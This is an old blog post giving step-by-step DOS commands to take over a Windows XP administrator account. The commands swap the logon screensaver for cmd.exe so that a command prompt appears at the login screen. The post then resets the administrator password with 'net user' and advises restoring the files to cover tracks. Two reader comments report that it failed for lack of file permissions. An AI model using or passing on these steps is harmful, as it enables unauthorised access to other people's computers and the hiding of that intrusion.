How to Hack Windows XP Admin Password
This Website has been moved to a new Domain
Wednesday, November 28, 2007
If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly :
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt without logging into XP.
Once this happens if you enter this command :
net user
If the Administrator Account is called Frank and you want the password blah enter this
net user Frank blah
and this changes the password on franks machine to blah and your in.
Have Fun!
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
what next?
You can also bookmark this post using your favorite bookmarking service:
Rate and Review this Blog:
December 17, 2007 at 11:51 PM
it wont work 4 me...ill explain wot happens after cuz i need to get my dinner :P
February 12, 2008 at 3:18 PM
Nice try... but I don't have the permission to create modify or delete any folder or file... AnĂ other method?